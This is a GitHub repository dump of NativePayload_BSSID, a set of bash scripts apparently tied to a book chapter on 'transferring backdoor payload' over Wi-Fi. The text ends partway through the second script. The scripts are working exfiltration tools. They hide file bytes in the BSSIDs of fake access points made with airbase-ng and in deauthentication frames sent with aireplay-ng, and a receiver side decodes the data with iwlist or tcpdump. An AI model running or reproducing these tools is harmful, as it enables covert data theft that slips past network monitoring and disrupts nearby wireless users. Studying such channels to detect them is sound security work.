├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID ├── NativePayload_BSSID.sh ├── NativePayload_BSSID1.png ├── NativePayload_BSSID2.png ├── NativePayload_BSSIDv2 │ ├── NativePayload_BSSID Step1.png │ ├── NativePayload_BSSID Step2.png │ ├── NativePayload_BSSID Step3.png │ ├── NativePayload_BSSID Step4.png │ ├── NativePayload_BSSID help.png │ ├── NativePayload_BSSID.sh │ └── README.md └── README.md ├── EBOOK ├── Client_Exfiltration_via_FakeAP.sh ├── Client_killAP.sh ├── GetData.png ├── README.md ├── Server_GetData_via_BSSID.sh └── Server_iwlist_Scan.sh ├── NativePayload_BSSID v2 ├── NativePayload_BSSID.sh └── README.md ├── NativePayload_BSSID.cs ├── README.md ├── Video-[v2] ├── README.md ├── Video.NativePayload_BSSIDv2.zip.part-aa ├── Video.NativePayload_BSSIDv2.zip.part-ab ├── Video.NativePayload_BSSIDv2.zip.part-ac ├── Video.NativePayload_BSSIDv2.zip.part-ad └── Video.NativePayload_BSSIDv2.zip.part-ae └── managedwifi.dll /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/1.png -------------------------------------------------------------------------------- /2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/2.png -------------------------------------------------------------------------------- /3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/3.png -------------------------------------------------------------------------------- /4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/4.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_BSSID.sh , Published by Damon Mohammadbagher 2017-2018" 4 | echo "Injecting/Downloading/Uploading DATA via BSSID (Wireless Traffic)" 5 | echo "help syntax: ./NativePayload_BSSID.sh help" 6 | echo 7 | function killairbase 8 | { 9 | 10 | sleep 10 ; 11 | echo 12 | killall airbase-ng ; 13 | 14 | } 15 | if [ $1 == "help" ] 16 | then 17 | tput setaf 2; 18 | echo 19 | echo "Example Step1: (Client Side ) ./NativePayload_BSSID.sh -f text-file Fake-AP-Name MonitorMode-Interface" 20 | echo "Example Step2: (Server Side ) ./NativePayload_BSSID.sh -s wlanx Exfil-Dump-file" 21 | echo "example System A : ./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon" 22 | echo "example System B : ./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt" 23 | echo "Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)" 24 | echo "Note : before step1 you should make MonitorMode Interface (WlanXmon) by this command for example : airmon-ng start wlan3 " 25 | echo 26 | 27 | fi 28 | 29 | # ./NativePayload_BSSID.sh -f mytext.txt Fake wlan1mon0 30 | # making fake mode 31 | if [ $1 == "-f" ] 32 | then 33 | for bytes in `xxd -p -c 5 $2 | sed 's/../&:/g'`; 34 | do 35 | tput setaf 6; 36 | Exfil="${bytes::-1}" 37 | text=`echo $Exfil | xxd -r -p` 38 | Time=`date '+%d/%m/%Y %H:%M:%S'` 39 | echo "[!] [$Time] #Injecting text: "\"$text\" "to Mac via BSSID" 00:$Exfil "for FAKE AccessPoint: " $3 40 | sleep 0.3 41 | tput setaf 9; 42 | # Making Fake AP via airbase and Injecting Payloads to BSSIDs (MAC Address) 43 | killairbase | airbase-ng -a 00:$Exfil --essid $3 -I 10 -0 $4 | grep started 44 | 45 | done 46 | Time=`date '+%d/%m/%Y %H:%M:%S'` 47 | tput setaf 6; 48 | echo "[>] [$Time] Setting Finish Flag to BSSID..." 49 | sleep 0.3 50 | tput setaf 9; 51 | killairbase | airbase-ng -a 00:ff:00:ff:00:ff --essid $3 -I 10 -0 $4 | grep started 52 | fi 53 | 54 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 55 | # starting scan mode 56 | if [ $1 == "-s" ] 57 | then 58 | echo "Scanning Mode by \"Iwlist\" tool Started." 59 | echo "" > $3 60 | while true 61 | do 62 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 63 | echo `iwlist $2 'scan' | grep -e "Address: 00:"` >> $3 ; 64 | tput setaf 9; 65 | Time=`date '+%d/%m/%Y %H:%M:%S'` 66 | echo "[!] [$Time] iwlist AP list Dumped to file: " $3; 67 | sleep 6 ; 68 | FinishFlag=`cat $3 | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 69 | if (( `echo ${#FinishFlag}` !=0 )) 70 | then 71 | Time=`date '+%d/%m/%Y %H:%M:%S'` 72 | sleep 0.3 73 | tput setaf 7; 74 | echo "[!] [$Time] Finish flag BSSID Address Detected :" 00:ff:00:ff:00:ff 75 | break 76 | fi 77 | done 78 | tput setaf 9; 79 | # fold -w37 $3 > output.txt ; 80 | Time=`date '+%d/%m/%Y %H:%M:%S'` 81 | echo "[>] [$Time] AP List saved to" \"temp.txt\" "file" 82 | echo 83 | 84 | # DEBUG 85 | # cat output.txt 86 | fold -w37 $3 > temp.txt; 87 | awk {'print $5'} temp.txt > temp2Awk.txt; 88 | # using '!a[$0]++' is not good idea ;) sometimes.... . 89 | for ops in `awk '!a[$0]++' temp2Awk.txt | xxd -p`; 90 | do 91 | ops1=`echo $ops | xxd -r -p` 92 | ops2=`echo $ops | xxd -r -p | xxd -r -p` 93 | echo $ops1 "==>" $ops2 94 | done 95 | echo 96 | echo "[!] your Injected Bytes via BSSID Addresses: " 97 | echo 98 | echo `awk '!a[$0]++' temp2Awk.txt` 99 | echo 100 | echo "[!] your Text/Data: " 101 | echo 102 | ExfilString=`cat temp2Awk.txt | awk '!a[$0]++'` 103 | echo "${ExfilString::-17}" | xxd -r -p 104 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 105 | echo " " > ExfilOutput_$Timestr.txt 106 | echo 107 | echo "[>] your Text/Data saved to" \"ExfilOutput_$Timestr.txt\" "file" 108 | str=`echo "${ExfilString::-17}" | xxd -r -p` 109 | echo $str > ExfilOutput_$Timestr.txt 110 | fi 111 | -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID1.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID2.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step1.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step2.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step3.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step4.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID help.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_BSSID.sh v2 , Published by Damon Mohammadbagher 2017-2019" 4 | echo "Injecting/Downloading/Uploading DATA via BSSID (Wireless Traffic)" 5 | echo "help syntax: ./NativePayload_BSSID.sh help" 6 | echo 7 | 8 | function _help () 9 | { 10 | tput setaf 2 11 | echo 12 | echo "[@]:NativePayload_BSSID.sh $(tput setaf 11)v2$(tput setaf 2) , Published by $(tput setaf 3)Damon Mohammadbagher 2017-2019$(tput setaf 2)" 13 | echo "[@]:NativePayload_BSSID.sh (Internal.Commands):" 14 | echo 15 | tput setaf 10 16 | echo "[@]:Client/Server Side (Internal.Commands):" 17 | echo 18 | tput setaf 2 19 | printf '\u2507'; echo "$(tput setaf 11) @help $(tput setaf 2) => show all internal Commands" 20 | printf '\u2523\u2509'; echo "Description: Help for commands" 21 | printf '\u2516\u2509'; echo "Example:#@help" 22 | echo 23 | printf '\u2507'; echo "$(tput setaf 11) @exit $(tput setaf 2) => exit" 24 | printf '\u2523\u2509'; echo "Description: exit to Console" 25 | printf '\u2516\u2509'; echo "Example:#@exit" 26 | echo 27 | printf '\u2507'; echo "$(tput setaf 11) @clientmode $(tput setaf 2) or $(tput setaf 11) @cli $(tput setaf 2) => switch to client mode" 28 | printf '\u2523\u2509'; echo "Description: switch to client mode" 29 | printf '\u2523\u2509'; echo "Example:#@clientmode" 30 | printf '\u2516\u2509'; echo "Example:#@cli" 31 | echo 32 | printf '\u2507'; echo "$(tput setaf 11) @servermode $(tput setaf 2) or $(tput setaf 11) @serv $(tput setaf 2) => switch to server mode" 33 | printf '\u2523\u2509'; echo "Description: switch to server mode" 34 | printf '\u2523\u2509'; echo "Example:#@servermode" 35 | printf '\u2516\u2509'; echo "Example:#@serv" 36 | echo 37 | printf '\u2507'; echo "$(tput setaf 11) @clear $(tput setaf 2) => Console clear" 38 | printf '\u2523\u2509'; echo "Description: Console clear" 39 | printf '\u2516\u2509'; echo "Example:#@clear" 40 | echo 41 | printf '\u2507'; echo "$(tput setaf 11) @dbgon $(tput setaf 2) => show details : enable" 42 | printf '\u2523\u2509'; echo "Description: show all details" 43 | printf '\u2516\u2509'; echo "Example:#@dbgon" 44 | echo 45 | printf '\u2507'; echo "$(tput setaf 11) @dbgoff $(tput setaf 2) => show details : disable" 46 | printf '\u2523\u2509'; echo "Description: Disabling details (default)" 47 | printf '\u2516\u2509'; echo "Example:#@dbgoff" 48 | echo 49 | tput setaf 10 50 | echo "[@]:Server Side (only) (Internal.Commands):" 51 | echo 52 | tput setaf 2 53 | printf '\u2507'; echo "$(tput setaf 11) @bssid $(tput setaf 2) or $(tput setaf 11) bssid $(tput setaf 2) => Scanning BSSID via Iwlist (server-side) $(tput setaf 3)(Old v1 / slow)$(tput setaf 2)" 54 | printf '\u2523\u2509'; echo "Description: Scanning BSSID on AIR via Iwlist tool to dump Exfil/Text/Data from (client-side) (default)" 55 | printf '\u2523\u2509'; echo "Example:#@bssid" 56 | printf '\u2516\u2509'; echo "Example:#bssid" 57 | echo 58 | printf '\u2507'; echo "$(tput setaf 11) @deauth $(tput setaf 2) or $(tput setaf 11) deauth $(tput setaf 2) => Attack.(Deauth) Packet Monitoring for Fake AP (server-side) $(tput setaf 3)(New v2 / very fast)$(tput setaf 2)" 59 | printf '\u2523\u2509'; echo "Description: Monitoring WlanMon interface (Monitor-Interface) to Detect Recevied Payload via Deauth Attack Packets from Clients" 60 | printf '\u2523\u2509'; echo "Example:#@deauth" 61 | printf '\u2516\u2509'; echo "Example:#deauth" 62 | echo 63 | printf '\u2507'; echo "$(tput setaf 11) @run $(tput setaf 2) => running server side Methods [BSSID or DeAuth]" 64 | printf '\u2523\u2509'; echo "Description: running server side Methods [BSSID or DeAuth]" 65 | printf '\u2516\u2509'; echo "Example:#@run" 66 | 67 | } 68 | function killairbase 69 | { 70 | 71 | sleep 10 ; 72 | echo 73 | killall airbase-ng ; 74 | 75 | } 76 | 77 | ################################################## version 1 ################################################## 78 | ################################################## send_Bssids v1 ################################################# 79 | # ./NativePayload_BSSID.sh -f mytext.txt Fake wlan1mon0 80 | # making fake mode (send_Bssids) 81 | if [ $1 == "-f" ] 82 | then 83 | for bytes in `xxd -p -c 5 $2 | sed 's/../&:/g'`; 84 | do 85 | tput setaf 6; 86 | Exfil="${bytes::-1}" 87 | text=`echo $Exfil | xxd -r -p` 88 | Time=`date '+%d/%m/%Y %H:%M:%S'` 89 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $3 90 | sleep 0.3 91 | tput setaf 9; 92 | # Making Fake AP via airbase and Injecting Payloads to BSSIDs (MAC Address) 93 | killairbase | airbase-ng -a 00:$Exfil --essid $3 -I 10 -0 $4 | grep started 94 | 95 | done 96 | Time=`date '+%d/%m/%Y %H:%M:%S'` 97 | tput setaf 6; 98 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 99 | sleep 0.3 100 | tput setaf 9; 101 | killairbase | airbase-ng -a 00:ff:00:ff:00:ff --essid $3 -I 10 -0 $4 | grep started 102 | fi 103 | ################################################## send_Bssids v1 ##################################### 104 | ################################################## receive_Bssids v1 ##################################### 105 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 106 | # starting scan mode (dump_Bssids) 107 | if [ $1 == "-s" ] 108 | then 109 | echo "Scanning Mode by \"Iwlist\" tool Started." 110 | echo "" > $3 111 | while true 112 | do 113 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 114 | echo `iwlist $2 'scan' | grep -e "Address: 00:"` >> $3 ; 115 | tput setaf 9; 116 | Time=`date '+%d/%m/%Y %H:%M:%S'` 117 | echo "[!]:[$Time] iwlist AP list Dumped to file: " $3; 118 | sleep 4.2 ; 119 | FinishFlag=`cat $3 | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 120 | if (( `echo ${#FinishFlag}` !=0 )) 121 | then 122 | Time=`date '+%d/%m/%Y %H:%M:%S'` 123 | sleep 0.3 124 | tput setaf 7; 125 | echo "[!]:[$Time] Finish flag BSSID Address Detected :" 00:ff:00:ff:00:ff 126 | break 127 | fi 128 | done 129 | tput setaf 9; 130 | # fold -w37 $3 > output.txt ; 131 | Time=`date '+%d/%m/%Y %H:%M:%S'` 132 | echo "[>] [$Time] AP List saved to" \"temp.txt\" "file" 133 | echo 134 | 135 | # DEBUG 136 | # cat output.txt 137 | fold -w37 $3 > temp.txt; 138 | awk {'print $5'} temp.txt > temp2Awk.txt; 139 | # using '!a[$0]++' is not good idea ;) sometimes.... . 140 | for ops in `awk '!a[$0]++' temp2Awk.txt | xxd -p`; 141 | do 142 | ops1=`echo $ops | xxd -r -p` 143 | ops2=`echo $ops | xxd -r -p | xxd -r -p` 144 | echo $ops1 "==>" $ops2 145 | done 146 | echo 147 | echo "[!] your Injected Bytes via BSSID Addresses: " 148 | echo 149 | echo `awk '!a[$0]++' temp2Awk.txt` 150 | echo 151 | echo "[!] your Text/Data: " 152 | echo 153 | ExfilString=`cat temp2Awk.txt | awk '!a[$0]++'` 154 | echo "${ExfilString::-17}" | xxd -r -p 155 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 156 | echo " " > ExfilOutput_$Timestr.txt 157 | echo 158 | echo "[>] your Text/Data saved to" \"ExfilOutput_$Timestr.txt\" "file" 159 | str=`echo "${ExfilString::-17}" | xxd -r -p` 160 | echo $str > ExfilOutput_$Timestr.txt 161 | fi 162 | ################################################## receive_Bssids v1 ##################################### 163 | ################################################## version 1 ################################################## 164 | 165 | ################################################################################################################### 166 | ################################################################################################################### 167 | ################################################################################################################### 168 | 169 | ################################################## version 2 ################################################## 170 | ################################################## send_Bssids v2 ############################### 171 | function sendBssids 172 | { 173 | tput setaf 6; 174 | Time=`date '+%d/%m/%Y %H:%M:%S'` 175 | echo "[>]:[$Time] Exfiltration.via.BSSID:Started" 176 | 177 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 178 | do 179 | 180 | Exfil="${bytes::-1}" 181 | text=`echo $Exfil | xxd -r -p` 182 | Time=`date '+%d/%m/%Y %H:%M:%S'` 183 | if [ "$4" == "true" ] 184 | then 185 | tput setaf 10; 186 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $2 187 | else 188 | tput setaf 6; 189 | printf "." 190 | fi 191 | sleep 10 192 | tput setaf 9; 193 | tempaddress=`echo "00:$Exfil:20:20:20:20:20:20" | head -c17` 194 | killairbase | nohup airbase-ng -a $tempaddress --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 & 195 | done 196 | 197 | if [ "$4" == "false" ] 198 | then 199 | echo " " 200 | fi 201 | tput setaf 10; 202 | Time=`date '+%d/%m/%Y %H:%M:%S'` 203 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 204 | sleep 10 205 | 206 | killairbase | nohup airbase-ng -a 00:ff:00:ff:00:ff --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 & 207 | Time=`date '+%d/%m/%Y %H:%M:%S'` 208 | tput setaf 6; 209 | echo "[>]:[$Time] Exfiltration.via.BSSID:Done" 210 | tput setaf 2; 211 | } 212 | ################################################## send_Bssids v2 ############################### 213 | 214 | ################################################## receive_Bssids v2 ############################ 215 | function receiveBssids 216 | { 217 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 218 | # receiveBssids "wlan0" "myExfildump.txt" "false" 219 | #echo "Scanning Mode by \"Iwlist\" tool Started." 220 | Time=`date '+%d/%m/%Y %H:%M:%S'` 221 | tput setaf 6; 222 | echo "[>]:[$Time]:Iwlist.AP.Scanning.via.[$1]:Started" 223 | echo "" > $2 224 | while true 225 | do 226 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 227 | echo `iwlist $1 'scan' | grep -e "Address: 00:"` >> $2 ; 228 | if [ "$3" == "true" ] 229 | then 230 | tput setaf 10; 231 | Time=`date '+%d/%m/%Y %H:%M:%S'` 232 | echo "[!]:[$Time]:Iwlist.APlist.Saving.[$2]:Done"; 233 | else 234 | printf "." 235 | fi 236 | 237 | sleep 4.2 ; 238 | 239 | FinishFlag=`strings "$2" | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 240 | if (( `echo ${#FinishFlag}` !=0 )) 241 | then 242 | if [ "$3" == "false" ] 243 | then 244 | echo 245 | fi 246 | sleep 0.3 247 | tput setaf 6; 248 | Time=`date '+%d/%m/%Y %H:%M:%S'` 249 | echo "[!]:[$Time]:Finish.flag.BSSID.[00:ff:00:ff:00:ff]:Detected" 250 | break 251 | fi 252 | done 253 | 254 | tput setaf 6; 255 | Time=`date '+%d/%m/%Y %H:%M:%S'` 256 | echo "[>]:[$Time]:Iwlist.APlist.Saving.[temp.txt]:Done"; 257 | 258 | # DEBUG 259 | # cat output.txt 260 | tput setaf 10; 261 | fold -w37 $2 > temp.txt; 262 | awk {'print $5'} temp.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00://g' > temp2Awk.txt; 263 | 264 | tput setaf 2; 265 | Time=`date '+%d/%m/%Y %H:%M:%S'` 266 | printf "[!]:[$Time]:Injected.Bytes.[BSSID]:" 267 | echo `awk '!a[$0]++' temp2Awk.txt` 268 | ExfilString=`strings temp2Awk.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g'| awk '!a[$0]++' | xxd -r -p` 269 | tput setaf 10; 270 | echo "[!]:[$Time]:Dumped.[Text/Data]:$(tput setaf 11) $ExfilString" 271 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 272 | echo " " > "ExfilOutput_$Timestr.txt" 273 | str=`echo "$ExfilString" | xxd -r -p` 274 | echo $str > ExfilOutput_$Timestr.txt 275 | Time=`date '+%d/%m/%Y %H:%M:%S'` 276 | tput setaf 10; 277 | echo "[>]:[$Time]:Text.saved.[ExfilOutput_$Timestr.txt]:Done" 278 | tput setaf 2; 279 | } 280 | ################################################## receive_Bssids v2 ############################ 281 | 282 | ########################################### ExfilDeauth v2 (send) ############################### 283 | # ExfilDeauth "up.txt" "00:11:22:33:44:55" "wlan0" "1" 284 | # ExfilDeauth "local text file" "target AP/Fake AP BSSID" "local Wlan" "local wlan channel" 285 | function ExfilDeauth 286 | { 287 | Time=`date '+%d/%m/%Y %H:%M:%S'` 288 | tput setaf 6; 289 | echo "[>]:[$Time]:Exfiltration via Deauthentication Packets:Started" 290 | tput setaf 2; 291 | echo "[>]:[$Time]:Sending Deauthentication Packets via $3 by channel $4 to Default Target AP:Started" 292 | echo "[>]:[$Time]:Sending Deauthentication Packets to Target AP.BSSID.[00:11:22:33:44:55]:Started" 293 | 294 | `iwconfig $3 channel $4` 295 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 296 | id="0" 297 | 298 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 299 | do 300 | tput setaf 2; 301 | Exfil="${bytes::-1}" 302 | text=`echo "$Exfil:20:20:20:20:20:20" | head -c17 | xxd -r -p` 303 | Time=`date '+%d/%m/%Y %H:%M:%S'` 304 | 305 | if [ "$id" == "0" ] ; 306 | then 307 | Random1="0" 308 | id="1" 309 | elif [ "$id" == "1" ] ; 310 | then 311 | Random1="1" 312 | id="2" 313 | elif [ "$id" == "2" ] ; 314 | then 315 | Random1="2" 316 | id="3" 317 | elif [ "$id" == "3" ] ; 318 | then 319 | Random1="3" 320 | id="4" 321 | elif [ "$id" == "4" ] ; 322 | then 323 | Random1="4" 324 | id="5" 325 | elif [ "$id" == "5" ] ; 326 | then 327 | Random1="5" 328 | id="6" 329 | elif [ "$id" == "6" ] ; 330 | then 331 | Random1="6" 332 | id="7" 333 | elif [ "$id" == "7" ] ; 334 | then 335 | Random1="7" 336 | id="8" 337 | elif [ "$id" == "8" ] ; 338 | then 339 | Random1="8" 340 | id="9" 341 | elif [ "$id" == "9" ] ; 342 | then 343 | Random1="9" 344 | id="a" 345 | elif [ "$id" == "a" ] ; 346 | then 347 | Random1="a" 348 | id="b" 349 | elif [ "$id" == "b" ] ; 350 | then 351 | Random1="b" 352 | id="c" 353 | elif [ "$id" == "c" ] ; 354 | then 355 | Random1="c" 356 | id="d" 357 | elif [ "$id" == "d" ] ; 358 | then 359 | Random1="d" 360 | id="e" 361 | elif [ "$id" == "e" ] ; 362 | then 363 | Random1="e" 364 | id="f" 365 | elif [ "$id" == "f" ] ; 366 | then 367 | Random1="f" 368 | id="0" 369 | fi 370 | 371 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 372 | sleep 0.2 373 | 374 | if [ "$5" == "true" ] 375 | then 376 | tput setaf 10; 377 | Time=`date '+%d/%m/%Y %H:%M:%S'` 378 | echo "[!]:[$Time]:Injecting text: "\"$text\" "to Deauthentication Packet via" "[$tempaddress]" "for FAKE AccessPoint: " $2 379 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "Sending" & 380 | else 381 | printf "." 382 | tput setaf 10; 383 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "error ;)" & 384 | fi 385 | 386 | done 387 | 388 | if [ "$5" == "false" ] 389 | then 390 | echo " " 391 | fi 392 | sleep 0.1 393 | Time=`date '+%d/%m/%Y %H:%M:%S'` 394 | echo "[>]:[$Time]:Sending Finish Flag [00:ff:00:ff:00:ff] to target AccessPoint: $2" 395 | aireplay-ng -0 3 -a "$2" -c "00:ff:00:ff:00:ff" "$3" | grep "error ;)" & 396 | wait; 397 | Time=`date '+%d/%m/%Y %H:%M:%S'` 398 | tput setaf 6; 399 | echo "[!]:[$Time]:Exfiltration via Deauthentication Packets:Done" 400 | 401 | } 402 | ########################################### ExfilDeauth v2 (send) ############################### 403 | 404 | 405 | ########################################### ExfilDeauth v2 (receive) ############################ 406 | # ExfilDeauthDumps -dumpdeauth wlan1mon "1" 407 | # ExfilDeauthDumps "essid-fakev2" wlan1mon channel true 408 | function ExfilDeauthDumps 409 | { 410 | 411 | tput setaf 2; 412 | FakeAp="$1" 413 | 414 | if [ "$1" == "" ] 415 | then 416 | FakeAp="fakev2"; 417 | fi 418 | 419 | Time=`date '+%d/%m/%Y %H:%M:%S'` 420 | echo "[>]:[$Time]:Default AP.BSSID.[00:11:22:33:44:55]:Created" 421 | nohup airbase-ng -a 00:11:22:33:44:55 --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 422 | Time=`date '+%d/%m/%Y %H:%M:%S'` 423 | tput setaf 10; 424 | echo "[>]:[$Time]:Default AP.ESSID.[$FakeAp] with Wifi Channel.[$3] via $2:Started" 425 | tput setaf 2; 426 | sleep 1.5 427 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 &` 428 | sleep 1 429 | Time=`date '+%d/%m/%Y %H:%M:%S'` 430 | echo "[>]:[$Time]:$2 Packet Monitoring for DeAuthentication Traffic:Started" 431 | while true 432 | do 433 | if [ "$4" == "true" ] 434 | then 435 | printf '.' 436 | fi 437 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 438 | if (( `echo ${#FinishFlag}` !=0 )) 439 | then 440 | tput setaf 6; 441 | Time=`date '+%d/%m/%Y %H:%M:%S'` 442 | if [ "$4" == "true" ] 443 | then 444 | echo "" 445 | fi 446 | echo "[!]:[$Time]:Finish Flag:Detected" 447 | break; 448 | fi 449 | sleep 3.5 450 | done 451 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/00:11:22:33:44:55//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 452 | payload=`cat DeAuthbytes.txt` 453 | Time=`date '+%d/%m/%Y %H:%M:%S'` 454 | tput setaf 6; 455 | echo "[!]:[$Time]:Payload Dumping:Done" 456 | tput setaf 10; 457 | echo "[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload" 458 | nohup killall airbase-ng > "kill.txt" 2>&1 & 459 | nohup killall tcpdump > "kill.txt" 2>&1 & 460 | tput setaf 10; 461 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 462 | echo " " > "ExfilOutput_$Timestr.txt" 463 | echo $payload > "ExfilOutput_$Timestr.txt" 464 | echo "[>]:[$Time]:Text/Data saved to \"ExfilOutput_$Timestr.txt\"" 465 | tput setaf 2; 466 | } 467 | ########################################### ExfilDeauth v2 (receive) ############################ 468 | 469 | ############################### ExfilDeauth v2 (Command-based send) ############################### 470 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "bssid" wlan1 "7" 471 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "00:11:22:33:44:55" wlan1 "7" "dbg" 472 | if [ $1 == "-exfildeauth" ]; 473 | then 474 | `iwconfig $4 channel $5` 475 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 476 | id="0" 477 | 478 | for bytes in `strings $2 | xxd -p -c 5 | sed 's/../&:/g'`; 479 | do 480 | tput setaf 2; 481 | Exfil="${bytes::-1}" 482 | text=`echo $Exfil | xxd -r -p` 483 | 484 | tput setaf 10; 485 | 486 | if [ "$id" == "0" ] ; 487 | then 488 | Random1="0" 489 | 